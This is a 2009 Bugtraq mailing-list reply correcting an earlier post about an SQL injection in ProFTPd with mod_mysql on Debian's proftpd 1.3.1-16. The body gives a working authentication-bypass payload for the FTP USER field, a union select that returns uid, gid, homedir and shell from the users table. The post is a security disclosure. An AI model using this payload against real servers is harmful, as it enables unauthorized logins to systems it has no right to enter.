Bugtraq mailing list archives

Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

From: gat3way () gat3way eu
Date: Wed, 11 Feb 2009 00:20:56 -0700

Uh-oh, sorry, bad copy-paste..the user is just

%') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- 

not 

USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; -- 

I am using debian packaged proftpd 1.3.1-16 if that matters.

Current thread:

Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) gat3way (Feb 10)
- Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Daniel Mayer (Feb 10)
  - Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Shino (Feb 11)
- Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Sergio Aguayo (Feb 11)
- Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) Edward Bjarte Fjellskål (Feb 11)
- <Possible follow-ups>
- Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well) gat3way (Feb 11)